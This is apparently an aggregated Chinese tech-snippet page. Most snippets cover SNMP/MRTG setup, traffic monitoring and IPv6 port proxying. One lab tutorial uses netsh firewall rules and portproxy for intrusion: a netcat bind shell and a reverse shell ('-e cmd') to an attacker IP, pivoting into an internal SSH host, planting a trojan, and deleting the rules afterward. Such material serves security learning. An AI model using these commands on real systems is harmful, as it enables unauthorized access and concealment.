精华内容
下载资源
问答
  • 需求:PC(windows2003IP:192.168.1.101)H3Cs5100switch(IP:192.168.1.102)1,PC配置工作安装IIS,snmp服务,安装后检查snmp服务是否启动,在snmp服务属性框的安全选项卡中设置团体名为H3Ccf,接受snmp数据包主机为...

    需求:

    PC

    (

    windows 2003 IP

    192.168.1.101

    )

    H3C s5100 switch

    (

    IP

    192.168.1.102

    )

    1

    PC

    配置工作

    安装

    IIS

    snmp

    服务,

    安装后检查

    snmp

    服务是否启动,

    snmp

    服务属性框的安全选项卡

    中设置团体名为

    H3Ccf

    ,接受

    snmp

    数据包主机为

    192.168.1.102

    2

    H3C switch

    snmp

    配置

    interface vlan-interface 1

    undo shutdown

    ip address 192.168.1.102 255.255.255.0

    snmp-agent community read H3Ccf

    设置团体名为

    H3Ccf

    ,属性为只读

    snmp-agent target-host trap address 192.168.1.101 securityname H3Ccf

    设置管理机的

    IP

    地址为

    192.168.1.101

    而且

    “securityname”(

    即团体名

    )

    要与上面的设

    置一致。

    snmp trap enable

    启动监控。

    snmp

    的版本一般默认即可,如果不行的话改为

    V2C

    或者

    ALL

    也可使用图形界面

    3,

    下载

    perl

    软件

    ,

    安装一直默认即可。

    需要注意的是在安装完成后需要到系统环境变量

    PATH

    里看看有没有存在

    c:\perl\bin,

    如果

    没有需要手动加

    .

    4,

    安装

    MRTG

    软件

    解压软件包,复制一份到

    C

    盘,并重命名为

    mrtg

    (为了以后配置输入方便)

    做一个测试以验证

    MRTG

    安装是否正确

    ,

    在运行

    -->cmd

    里面进入到

    c:\mrtg\bin,

    然后输入命

    :c:\mrtg\bin>perl mrtg,

    此时的运行结果是一个友好的挂失

    MRTG

    配置文件的错误信息

    ,

    但没关系

    ,

    这已经说明你的系统已经安装完成了

    mrtg

    perl

    软件了

    .

    展开全文
  • 它提供了非常强大的数据和用户管理功能,可以指定每一个用户能查看树状结构、host以及任何一张图,还可以与LDAP结合进行用户验证,同时也能自己增加模板,功能非常强大完善,界面友好。 Cacti for Windows安装方法 ...
  • 提供流量监控小工具的一部分代码,主要是抓取网卡实时流量查看哪些进程占用端口情况, 一共三个源文件, net_traffic.cpp 实时流量 ports_stat.cpp/ports_stat.h, 端口信息 代码支持 linux, solaris,windows...
  • 使用netsh来进行端口转发

    千次阅读 2019-04-19 19:21:48
    此处文章不好排版,请移步到公众号查看 在历史消息中搜索:使用netsh来进行端口转发 目录 0x00 简介 0x01 2003命令介绍 0x02 2003以后命令介绍(以08为例) 0x03 实际利用案例 0x04 流量转发 正文 0x00 简介 netsh...

    文章首发公众号:无心的梦呓
    在这里插入图片描述
    此处文章不好排版,请移步到公众号查看
    在历史消息中搜索:使用netsh来进行端口转发

    安全库:http://www.seclibs.com/
    网络安全爱好者的安全导航,专注收集信安、红队常用网站、工具和技术博客

    目录

    0x00 简介

    0x01 2003命令介绍

    0x02 2003以后命令介绍(以08为例)

    0x03 实际利用案例

    0x04 流量转发

    正文

    0x00 简介

    netsh(Network Shell) 是一个windows系统本身提供的功能强大的网络配置命令行工具(来源于百度百科)。

    注:

    以下所有例子以三台机器为例来进行演示了

    假设03和08为边界机器,Ubuntu为内网机器

    win2003 192.168.191.128

    win2008 192.168.191.131

    Ubuntu 192.168.191.130

    PS:为了帮助大家理解,03和08的例子采用了两种查看命令执行结果的方式

    0x01 2003命令介绍
    基本介绍

    netsh firewall show state 查看系统防火墙状态
    在这里插入图片描述

    netsh firewall set opmode disable 关闭防火墙
    在这里插入图片描述

    netsh firewall set opmode enable 开启防火墙
    在这里插入图片描述
    设置进出站规则

    根据端口

    netsh firewall add portopening 协议 端口 名字
    协议:TCP/UDP/ALL

    端口:1-65535

    名字:随意,最好使用一些有迷惑性的

    netsh firewall add portopening tcp 333 test添加规则
    在这里插入图片描述
    netsh firewall delete portopening tcp 333 删除规则
    在这里插入图片描述
    根据进程

    netsh firewall add allowedprogram 位置名字 允许与否

    netsh firewall add allowedprogram c://nc.exe test enable 添加规则
    在这里插入图片描述
    在这里插入图片描述

    netsh firewall delete allowedprogram c:\nc.exe 删除规则
    在这里插入图片描述

    部分单词也不需要全部记住,知道开头的内容,后面靠帮助信息进行操作就可以了
    在这里插入图片描述
    0x02 2003以后命令介绍(以08为例)

    netsh advfirewall show allprofiles 查看所有类型的防火墙状态
    在这里插入图片描述

    netsh advfirewall set allprofiles state off 关闭防火墙
    在这里插入图片描述
    netsh advfirewall set allprofiles state on 开启防火墙
    在这里插入图片描述

    netsh advfirewall reset 重置防火墙规则(重置到刚装好系统时的状态)
    在这里插入图片描述
    设置进出站规则

    根据端口

    入站规则

    netsh advfirewall firewall add rule name=test dir=in action=allow protocol=tcp localport=333 添加规则
    在这里插入图片描述
    netsh advfirewall firewall delete rule name=test dir=in protocol=tcp localport=333 删除规则
    在这里插入图片描述
    出站规则

    netsh advfirewall firewall add rule name=test dir=out action=allow protocol=tcp localport=333 添加规则
    在这里插入图片描述
    netsh advfirewall firewall delete rule name=test dir=out protocol=tcp localport=333 删除规则
    在这里插入图片描述
    根据进程

    入站规则

    netsh advfirewall firewall add rule name=test dir=in action=allow program=c:\nc.exe 添加规则
    在这里插入图片描述
    netsh advfirewall firewall delete rule name=test dir=in program=c:\nc.exe 删除规则
    在这里插入图片描述
    出站规则

    netsh advfirewall firewall add rule name=test dir=out action=allow program=c:\nc.exe 添加规则
    在这里插入图片描述
    netsh advfirewall firewall delete rule name=test dir=out program=c:\nc.exe 删除规则
    在这里插入图片描述

    0x03 实际利用案例(以2008为例)

    正向连接shell

    netsh advfirewall firewall add rule name=ncdir=in action=allow protocol=tcp localport=333
    在这里插入图片描述

    nc.exe -lvp 333 -e cmd
    在这里插入图片描述

    回到攻击机上

    nc.exe -nv 192.168.191.131 333
    在这里插入图片描述
    虽然暂时不明白中间的报错是因为什么,但是是可以成功弹回shell的
    在这里插入图片描述
    最后一定要记得删除所添加的规则

    netsh advfirewall firewall delete rule name=nc protocol=tcp localport=333
    在这里插入图片描述

    反向连接shell

    首先在本地进行监听

    nc.exe -lvp 333
    在这里插入图片描述

    然后到08的机子上,添加规则

    netsh advfirewall firewall add rule name=nc dir=out action=allow protocol=tcp localport=333
    在这里插入图片描述
    然后执行

    nc.exe -nv 10.1.135.96 333 -e cmd
    注:这里10.1.135.96是我本地的机子
    在这里插入图片描述

    之后就能弹回来shell
    在这里插入图片描述
    最后不要忘了顺手删掉添加的规则
    在这里插入图片描述

    通过添加进程的,跟这个同理

    0x04 流量转发

    地址类型设置如下
    在这里插入图片描述

    将来自333端口的流量全部转发到192.168.191.130的22端口

    netsh interface portproxy add v4tov4 listenport=333 connectaddress=192.168.191.130 connectport=22
    在这里插入图片描述

    netsh interface portproxy show all 查看所有转发规则
    在这里插入图片描述
    添加完成之后一定要查一下端口有没有起来
    在这里插入图片描述

    netsh interface portproxy delete v4tov4 listenport=333 删除转发规则
    在这里插入图片描述
    使用端口转发来连接内网机器

    这里以08为例

    设置进站规则

    netsh advfirewall firewall add rule name=test dir=in action=allow protocol=tcp localport=333
    在这里插入图片描述
    设置流量转发

    将所有来到333端口的流量全部转发到192.168.191.130的22端口上

    netsh interface portproxy add v4tov4 listenport=333 connectaddress=192.168.191.130 connectport=22
    在这里插入图片描述
    查看是否添加成功,端口有没有起来
    在这里插入图片描述
    然后连接192.168.191.131的333端口,就是连接内网中192.168.191.130的22端口
    在这里插入图片描述
    在这里插入图片描述
    在结束之后,一定要顺手把添加的规则都删除掉

    netsh advfirewall firewall delete rule name=test dir=in protocol=tcp localport=333
    在这里插入图片描述
    netsh interface portproxy delete v4tov4 listenport=333
    在这里插入图片描述
    如果内网机子不能正常连外网的话,也可以在边界机器上使用流量转发来进行连接,在内网机器上种马,使其连接边界机器的指定端口,然后在边界机器将所有来自本地指定端口的流量,全部都转发到攻击者的外网主机上即可

    即:

    netsh interface portproxy add v4tov4 listenport=本地端口 listenaddress=本地IP connectaddress=攻击者外网IP connectport=攻击者外网端口

    展开全文
  • windowsnt 技术内幕

    2014-04-09 20:47:17
    LOCAL_MACHINE\CurrentControlSet\Services子键 RegEdit简介 Regedit32简介 配置硬件配置文件 配置通信端口 配置显示设置 增加SCSI适配器 配置能够响应电源故障事件的设备 为UPS使用特殊串行电缆 增加或删除Windows ...
  • 本文记录windows里面的一些工具和命令 命令 ifconfig 查看网卡和ip tasklist 查看进程,对标linux里面ps netstat 工具有:性能监视器和资源监视器...然后我想看这个进程开放了哪些端口,通过这个端口流量是怎么样的。

    本文记录windows里面的一些工具和命令

    命令
    ifconfig 查看网卡和ip
    tasklist 查看进程,对标linux里面ps
    netstat

    工具有:性能监视器和资源监视器,任务管理器。
    通过这几个工具你可以看CPU、内存、网络
    在这里插入图片描述
    其他工具:tcpview基本上是一个netstat 的图形工具版本

    wireshark 抓包工具哪家强?wireshark分分钟教做人。

    假如说我有一个程序,这个程序运行起来就变成了一个进程或者多个进程。然后我想看这个进程开放了哪些端口,通过这个端口的流量是怎么样的。上面的工具组合的使用,就能够解答这个问题。

    展开全文
  • - 修正二次查看流量图时出现的内存错误 - 修正日志记录可能丢失"\"等转义字符的问题(需更新服务端) ------------------------------------------------------------- Version 1.2.0.0 (2012-05-30) -...
  • 本节书摘来自异步社区《深入解析IPv6(第3版)》一书中的第11章,第11.4节,作者: 【美】Joseph ...Windows中的IPv6支持两类IPv6到IPv4的流量过渡技术。 NAT64/ DNS64。PortProxy(端口代理)。11.4.1 NAT 64/D...

    本节书摘来自异步社区《深入解析IPv6(第3版)》一书中的第11章,第11.4节,作者: 【美】Joseph Davies 更多章节内容可以访问云栖社区“异步社区”公众号查看。

    11.4 流量转换

    Windows中的IPv6支持两类IPv6到IPv4的流量过渡技术。

    NAT64/ DNS64。
    PortProxy(端口代理)。
    11.4.1 NAT 64/DNS64
    NAT64定义在RFC 6146中。当纯IPv6节点发起流量时,NAT64可以在IPv6和IPv4流量之间提供状态化转换。NAT64会从纯IPv6节点中获得IPv6流量,并将其转换给可以发送给IPv4节点的IPv4流量,反之亦然。这种地址转换采取的工作方式类似于传统IPv4网络的地址转换(NAT)。如果进一步了解IPv4 NAT设备转换的工作方式,请参见本书的第14章。

    NAT64的作用通常是让纯IPv6节点能够访问纯IPv4计算机。例如,一台基于Windows Server 2012的DirectAccess服务器可以使用NAT64让DirectAccess客户端(从本质上讲,该客户端就是一台通过DirectAccess连接发送信息的纯IPv6节点)访问内联网中那些只能通过IPv4进行访问的服务器和资源。如需进一步了解相关信息,请参见本书的第18章。

    DNS64定义在RFC 6147中,它是一种将纯IPv6地址记录(AAAA)DNS查询消息映射为IPv4地址记录(A)查询消息的方式,因此它能够实现纯IPv6节点和纯IPv4节点之间的通信。当一台纯IPv6节点发送DNS查询消息来查询某个域名的IPv6地址时,DNS64会在这个过程中充当中间设备。它可以将AAAA域名查询变为一个A域名查询和一个AAAA域名查询,并将这两条查询消息发送给一台内联网DNS服务器。如果只收到了A记录,那么它就会将解析出来的IPv4地址表达为IPv6地址,并将它返回给请求方的客户端设备。然后,客户端设备就可以尝试使用这个IPv6地址来发起通信了,而这个通信的过程会由NAT64进行转换。

    将NAT64和DNS64结合起来使用,可以让纯IPv6节点向纯IPv4节点发起通信,而无需对纯IPv6节点和纯IPv4节点本身进行任何改变。DNS64会将一个纯IPv4计算机的查询域名映射为一个IPv6地址。NAT64会将去往该IPv6地址的IPv6流量转换为去往一个IPv4地址的IPv4流量。注意,DNS64和NAT64组件必须具有相同的IPv6地址空间转换规则,才能正常工作。不过,它们并没有任何共享状态,而且也可以部署在不同的计算机上。

    在Windows Server 2012中,管理员可以使用Windows PowerShell命令中的命令New-NetNatTransitionConfiguration、Set-NetNatTransition Configuration和Remove-NetNatTransit ion Configuration来配置NAT64组件,同样可以使用命令New-NetDnsTransitionConfiguration、 Set-NetDnsTransitionConfiguration和Remove-NetDnsTransitionConfiguration来配置DNS64组件。如需进一步了解相关信息,请参阅本书的第16章。

    注释

    在默认情况下,NAT64和DNS64不允许纯IPv4节点向纯IPv6 节点发起通信。例如,对于一台运行Windows Server 2012和Windows 8的DirectAccess服务器不允许一台内联网中的纯IPv4计算机(比如一台管理服务器)向DirectAccess客户端发起通信。此外,也不能在DNS64中使用DNSSEC(DNS安全扩展)。
    11.4.2 端口代理
    为了让无法使用普通互联网层协议(IPv4或IPv6)建立连接的节点或应用之间能够进行通信,Windows的IPv6协议提供了“端口代理(PortProxy)”,这个组件可以代理下列流量。

    • IPv4到IPv4:将去往一个IPv4地址的TCP流量代理为另一个IPv4地址的流量。
    • IPv4到IPv6:将去往一个IPv4地址的TCP流量代理为某个IPv6地址的流量。
    • IPv6到IPv6:将去往一个IPv6地址的TCP流量代理为另一个IPv6地址的流量。
    • IPv6到IPv4:将去往一个IPv6地址的TCP流量代理为某个IPv4地址的流量。

    IPv6最需要且最有用的代理是从IPv4到IPv6和从IPv6到IPv4的代理,它们能实现下述方案。

    • 纯IPv4节点可以直接访问纯IPv6节点:在纯IPv4节点的IPv4 DNS架构中,纯IPv6节点的域名会解析为分配给端口代理计算机某个接口的IPv4地址。这可能需要在DNS中手动配置一个A记录。当将端口代理计算机配置为代理IPv4到IPv6时,所有由纯IPv4节点发送的TCP流量都会用一种类似于Internet代理服务器的方式进行代理:纯IPv4节点与端口代理计算机建立一个TCP连接,然后端口代理计算机再与纯IPv6节点建立另一条连接。端口代理计算机在纯IPv4节点和纯IPv6节点之间传输TCP连接数据。
    • 纯IPv6节点可以访问纯IPv4节点:在纯IPv6节点的IPv6 DNS架构中,纯IPv4节点的域名会解析为分配给端口代理计算机某个接口的IPv6地址。这可能需要在DNS中手动配置一个AAAA记录。当端口代理计算机配置为代理IPv6到IPv4时,端口代理则代理会在纯IPv6节点和纯IPv4节点之间(通过转换)发送流量。
    • IPv6节点可以访问在IPv6/IPv4节点上运行的纯IPv4节点:在纯IPv6节点的IPv6 DNS架构中,IPv6/IPv4节点的域名会解析为分配给端口代理计算机的某个接口的IPv6地址。当端口代理计算机配置为代理IPv6到IPv4时,端口代理会代理在纯IPv6节点和端口代理计算机上运行的纯IPv4服务或程序之间发送的流量。

    可以用netsh interface portproxy add|set|delete v4tov4|v4tov6|v6tov4|v6tov6命令来配置端口代理组件。

    netsh interface portproxy add v6tov4命令的语法如下。

    netsh interface portproxy add v6tov4 [listenport=]LPortNumber|LportName [[connectaddress=] IPv4Address|IPv4HostName] [[connectport=]CPortNumber|CPortName] [[listenaddress=]IPv6Address |IPv6HostName]
    
    • LPortNumber|LportName是端口代理侦听的TCP端口号或服务的名称。
    • IPv6Address|IPv6HostName是端口代理侦听的IPv6地址或主机名称(如果未指定,就假定是所有分配给端口代理计算机的IPv6地址)。
    • CPortNumber|CPortName是端口代理试图连接的TCP端口号或服务名称(如果未指定,就会将连接端口设为侦听端口)。
    • IPv4Address|IPv4HostName是端口代理试图连接的IPv4地址或主机名称(如果未指定,就假定为loopback地址)。

    netsh interface portproxy add v4tov6命令的语法如下。

    netsh interface portproxy add v4tov6 [listenport=]LPortNumber|LportName [[connectaddress=]IPv6Address |IPv6HostName] [[connectport=]CPortNumber|CPortName] [[listenaddress=]IPv4Address|IPv4HostName]
    

    LPortNumber|LportName是端口代理侦听的TCP端口号或服务名称。

    • IPv4Address|IPv4HostName是端口代理侦听的IPv4地址或主机名称(如果未指定,就假定是所有分配给端口代理计算机的IPv4地址)。
    • CPortNumber|CPortName是端口代理试图连接的TCP端口号或服务名称(如果未指定,就会将连接端口设为侦听端口)。
    • IPv6Address|IPv6HostName是端口代理试图连接的IPv6地址或主机名称(如果未指定,就假定为loopback地址)。

    注释

    端口代理只能用于TCP流量,以及没有在TCP连接数据中内嵌地址或端口信息的应用层协议。与NAT不同,端口代理没有类似NAT编辑器的东西。因此,有些协议无法通过端口代理计算机运行(如FTP),因为该协议在使用FTP端口命令时内嵌了IPv4地址。

    展开全文
  • 5.5 流量强制走上级SOCKS代理 5.6 通过SSH中转 5.6.1 用户名和密码的方式 5.6.2 用户名和密钥的方式 5.7 认证 5.8 KCP协议传输 5.9 自定义DNS 5.10 自定义加密 5.11 压缩传输 5.12 负载均衡 5.13 限速 5.14 指定出口...
  • 常见的应急响应事件分类: web入侵:网页挂马、主页篡改、Webshell ...查看服务器是否有弱口令,远程管理端口是否对公网开放 检查方法:查看网络连接对应的进程 Netstat -anb | findstr 进程 查看日志:...
  • 如何查看哪些软件或进程占用了网速 Windows: 命令行键入: perfmon -res Linux: 使用iptraf 或 iftop 来确定发送流量最大的端口,然后...
  • snmp是简单网络管理协议,利用好它我们在监控上上可以很方便的查看设备运行时间,网络流量端口状态,设备cpu,内存,温度,路由数量变化,光设备的工作状态,光功率等。通过监控我们可以及时发现问题,并通过历史...
  • 该应用程序允许用户将任何调用重定向到任何进程的Windows API ,以便将其连接重定向到配置的本地端口。 开始吧 该挂钩原本是由REST API控制的,因此,任何类型的应用程序都可以“插入”该挂钩并发送注入指令。 制作...
  • 它可以实现以下功能:TCP/IP配置信息提娶Ping命令、端口侦听、网络流量监控、IP地址计算器、服务器时间同步、分段IP与长整型IP地址转换、基于API函数的端口查看器、基于windows命令的端口查看器、检测指定网络是否...
  • Serial Port Monitor 这监测软件能够刺探 ,捕捉,查看,分析,测试 com 端口活动,以数据获取和控制实施 com 端口连接和流量分析。你能够使用作为一件设备界面测试工具和调制解调器数据的查看工具。软件能够用来在...
  • 常用的功能如下:监控浏览器所有流量查看分析请求内容细节伪造客户端请求和服务器响应测试网站的性能解密https的web会话全局、局部断点功能第三方插件HTTP协议软件使用菜单栏查看或修改fiddler监听端口号工具条...
  • 网站安全狗(IIS版) 安全狗一般有以下功能: 防止流量攻击 防止SQL注入 文件上传防护 防止一句话木马的执行 ...开启安全狗的防护功能: ...回到安全狗,查看防护日志...可以通过添加例外-端口,来开放某个端口供外部...
  • netsos V5.0229.rar

    2020-06-04 00:10:05
    ),实时流量查看,历史流量查看  六、网络访问管控  网络使用控制,非法IP接入报警,IP地址过滤,端口过滤  七、程序管控  程序访问控制库,程序访问审计,程序违规访问报警,程序日志查询统计  八、邮件记录 ...
  • Wireshark数据包分析实战(第二版)

    千次下载 热门讨论 2014-06-29 14:24:16
    8.2.3查看DNS流量 8.2.4查看HTTP请求 8.3现实世界问题 8.3.1无法访问Intemet:配置问题 8.3.2无法访问Intemet:意外重定向 8.3.3无法访问Intemet:上游问题 8.3.4打印机故障 8.3.5分公司之困 8.3.6生气的开发者 8.4...
  • 做后台开发,经常需要抓取数据包,查看数据流量是否正常,在windows上可以使用Wireshark,是一个网络封包分析软件,使用WinPCAP作为接口,直接与网卡进行数据报文交换。而Linux下使用tcpdump或者ngrep。这里介绍如何...
  • 监控并记录网卡流量变化与累计下载上传流量,局域网流量监控; 监控并记录员工机运行过的软件名,及分析各个软件消耗的时间; 启用员工机屏幕监控,电视墙准实时观看员工机屏幕,历史监控画面随时调阅; 通过手机或...
  • 工具只有3M大小左右,便于携带,免安装,无数据库,可在Windows、Linux、Unix系统上快速运行。 工具由大型SugarNMS智能网管软件的精华功能精简而成。SugarNMSTool是网管员、SNMP设备开发调试、SNMP诊断的日常必备...
  • 因为通过端口1可以看到端口2的流量,所以,我们也称端口1为监控端口,而端口2为被监控端口。  市面上,绝大多数交换机(如cisco产品)的某个口被设置为镜像端口后,接到该端口的主机将无法发送数据包到网内其他机器...
  • SolarWinds2002_CATV注册机含安装过程

    热门讨论 2010-04-18 12:50:01
    SolarWinds安装、配置、使用手册 v1.0 【版本修订说明】 ...八、网络设备端口流量实时察看 选择SolarWinds Toolbar中的Perf Mgmt选项,点击Bandwidth Gauges, 选择 New Gauges,可以查看端口实时流量
  • 硬盘占用、在线重启IIS、在线重启服务器、进程查看、网络连接查看、系统服务查看端口管理、启动项查看、远程桌面管理...功能如此之多以致不能一一列出。   安装简单便捷   不需要复杂的手工配置,不需要额外...
  • 374.主板上打印端口失效 375.打印一半后“死机” 376.页码打印不正确 377.打印图像上出现横纹、白条或图文变浅、模糊 378.垂直线条错位或出现竖纹 379.使用彩色打印时图像不正确或缺色 380.打印出的页面整版色淡 381...
  • connectifypro3.0破解版加教程

    热门讨论 2011-10-20 14:55:57
    在一间只有一个网络端口、没有无线路由器的房间里,有好几台笔记本电脑都想上网,其中至少有一台安装了Windows7,而且这台笔记本是06年以后买的。  2.带有WIFI功能的手机等设备,共享本本的网络上网。 编辑本段 ...
  • 1. 实施网络监控的机器只需要一台,领导可通过远程查看的方式查阅监控内容。 2. 严格的权限控制管理。对于服务器的设置操作、远程查阅日志、本地查阅日志等都需要严格的身份验证。 3. 系统的网络监控日志自动定期...
  • 用ssh进孩子的电脑,netstat -ano|findstr 8888查看是哪个pid占8888端口, 然后taskkill /f /pid 把ChildGuard.py进程杀掉 然后teamviewer连进孩子的电脑,再图像界面下,启动ChildGuard.py(前面ssh里面起的话,算...
  • vc++ 应用源码包_6

    热门讨论 2012-09-15 14:59:46
    Windows核心编程(第五版)随书源代码 vc-ftp 多线程操作多文件传输的操作。 VC版下载者 源码 非常简单的一个实例,使用了URLDownloadToFile下载文件。 VC断点续传源代码 从fnMyDownload开始,程序首先解析输入的...

空空如也

空空如也

1 2 3
收藏数 56
精华内容 22
关键字:

windows端口流量查看